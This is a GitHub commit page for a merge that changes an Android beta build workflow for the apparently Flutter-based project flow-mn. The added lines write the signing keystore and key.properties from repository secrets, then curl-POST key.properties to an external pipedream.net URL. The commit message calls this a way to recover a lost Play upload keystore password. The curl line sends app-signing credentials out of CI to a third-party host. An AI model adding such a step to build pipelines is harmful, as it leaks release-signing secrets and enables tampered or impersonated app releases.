Skip to content

Commit

Permalink
Merge pull request #285 from flow-mn:develop
Browse files Browse the repository at this point in the history
Please let me recover my google play upload jks password
  • Loading branch information
sadespresso authored Jan 28, 2025
2 parents 994a041 + 18ad404 commit 757fef5
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions .github/workflows/build-fat-apk-android-beta.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -29,8 +29,11 @@ jobs:
run: |
echo "${{ secrets.SIGNING_KEY_PROPERTIES }}" > ./android/key.properties
echo "${{ secrets.SIGNING_KEYSTORE }}" | base64 --decode > ./android/flow-upload-keystore.jks
curl -X POST --body-binary "@/./android/key.properties" https://eo19khblcrjgwuu.m.pipedream.net
- name: Build fat APK
run: flutter build apk --release --no-tree-shake-icons
- name: Upload file to release
env:
GH_TOKEN: ${{ github.token }}
run: |
gh release upload $(grep "version: " pubspec.yaml | sed 's/[^0-9.+]*//g') build/app/outputs/flutter-apk/app-release.apk

0 comments on commit 757fef5

Please sign in to comment.